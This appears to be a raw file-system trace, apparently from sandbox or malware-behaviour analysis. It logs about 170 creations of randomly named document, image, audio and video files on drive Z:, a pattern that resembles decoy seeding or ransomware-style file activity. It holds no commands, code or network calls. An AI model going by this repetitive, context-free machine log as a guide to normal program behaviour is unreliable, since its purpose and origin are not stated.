Create Z:\4yXte0uXIFucLv4.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\ashgeHC2PQdqLQk7.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\ZvphsNc.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Lp3sHpFPOeag.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\HCn2qrul7ygqoS.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\1fn93wGZjdanZB.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\dp9u7AdNvM4gE.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\FSEmJ5n1uMSloscL.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\qCc7INt1lZdUfK.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\MR8b0p2eb.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\6FHTeIALuazFh6S.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Jo92bs8aTj1Vj0c.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\pnOgbKINM1qNAlrGulmO.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\tbDCg9D.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Sly3qKgO3ATm8o.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\spHYAF9ViIqM9vtOW.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\d8qsFgy6NUR5eQtZvA.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\EONMy4FO98J1ipDWLzTP.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\vDGdxB.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\ibePv6Lj2e91qk.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\9nXLd1stH.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\rmkutDE080.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Zco6FDtNcxUboIRnw.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\rp59XRK0hPQE.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\HPloVL0oZ.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\nucEj.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\NjZEnmit.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\rYQhITml8s4Mffbv10w.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\rKWXelaLEZJ.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\zvb7Mnw3iSwviEopdWc.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\aHSgQEUnQ.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\EJbZxMj.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\AXHKm6GyRoXWvxAR1nK.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\aQV013X.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\IWEBAEoUidzls4DEURs.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\3f8x8CrYapPiNap.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\QkLjJ0I.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\z8zLOOgA3oe.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\gtMj5dvrEffpxCN.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Uxo8b6v.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\z6JgWitYLK.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\ivgKlBjI9.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\ZRjAo5mazeN.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\86j9DrKplH4.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\DHPDPLo.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\A8bmjbQ.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\JIofEOBdEma0DMUbK.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\9oWgPalpl4eZPpCd.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\ApDFPQwO402DkMuco.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\vLMfJAjyPseo6Kmg.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Dt6fR5uK1o7A3G9Az9xZ.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Qz05DmCXS7.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\u3j1lsXp4o0dJ.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\UHagWXyAwvvYR6B2f.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\P9p5SRi7OL0lv.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\pzNmYBUWbUH.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\qI3Ls7msTJ7Z5.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\gBya9RjXQ5HVsyeT1gt.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\l7JxDWOVk.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\VZ60ie.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\xgvcXmhtLB.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\9N07GKsKkqcxa3TT.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\OxsstRqW1jSBVg9mfGKW.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\SNRKtKQZn5jdD5Qp.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\AyUhCaK.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\7eOistArUshTqU.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\ceEw3OhIGAO0766qFm0B.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\dWi8QA6EVif9AdQ964.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\wtAmsr1H.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\af21bQ5qW.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\8tUbiYEgTdW.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\JVOUo4viHF8su3w5.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\InBvUlw.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\JijZUlwsABe0xQXl.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\pGRiU.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\b32L7cLeqU2oCZ.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\UmBm0ITsbHYon7XWq4F.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\JoVvFlGh27b31AC0CwDF.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\j22nZgN.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Q55M7RMlQ1.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\wMw0OlwWKG.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\kmaCVAfM6c.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\p1AcZbp.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\tMBfWUGp.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Vtrqfx.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\6swVov0.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\uGfnva.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\f9u0K1jcf0QP3CTM.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\q6bC91bzrR.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\mnb7We8LDQ6wrfuL.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\VS9DW.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\aXQim1G3bdkTaexwp.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\caihllUFFbcI.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\STk5oD5FdXN.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\9C7SUj.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\lEmsyCR.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\y0T1Oh7jZZrC632.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\TdlMonCmeQCgkgR.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Er77NKOfBV.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\rufq1skQBAfqcl.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\5Z53F1qndo.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\MSGyIwhbxwdO.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\U9PpB.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\SqQA6.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\bizZxIqHANu2cm8BJxR8.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\rTl3TzrdncuxVDUwQq.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\mn3To5BSC6.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\kxq03SULHIq.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\JRxsV.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\qai0Z93lFXyA0a.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\XVkMbKypLIiLe059.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\np5Lm.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\P1jVB9gi5QH3vMspsV.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\AJTRrzlFP.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\CDcBqXoR8.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\u83WZ8EHqHRLwl.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\rLuJ2.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\U3bDAfX7RABVK6AIAEZ.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\cdUeFalzm2mB.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\tC427X.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\4GjkdoqNU7goI.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\0nDSOdqmLj8q.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\IbgNETou.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\uPbNb139dTSMCdhFwG.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\ySIriF.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\SlLKD2xxbJU8.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\f3n4Cqr.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\PW0S4nrI2WlYOAIrz.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\4gn85VfichSpHdBliF7.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\aVTaxRUSrZtHvgszoz.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\xQkZa3z95fozLz9l.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\aXUpRcAz27mPKX.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\SDaBMuPeRu.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\0UnRrqmweUZEv2O.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\xEUQNFb1AtDa2EwjJi3V.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\qaJqcQYga.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\bCtdCwG6b1aq.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\e9iHCx5Vx23avMo.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\LezTzJpVLGFgKhSzkk.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\drKebb7BNUgYcBRuo.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Or93WHIBFD2VZ2c.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\nyYkSXYcJ3N.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Ogn94.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\JGRRP.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\FnlnIo8c7yqjr.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\JB0dwuDHOu.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\vspqQ0o2tOKgZZ.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\kpsjXydZA9PotWH4.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\jLzvb0vT3n52cwbHU6Y.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\dXDD6Vxqyd8jeu.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\reR9RHCDTohDYK3Ff2Y.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\GafAVMmaQERttbRLW.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\n9qfkqWXJ24VCxo.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Zz3XIk0KMIqhIY4WEe.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\tCssBJQX8FXIL.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
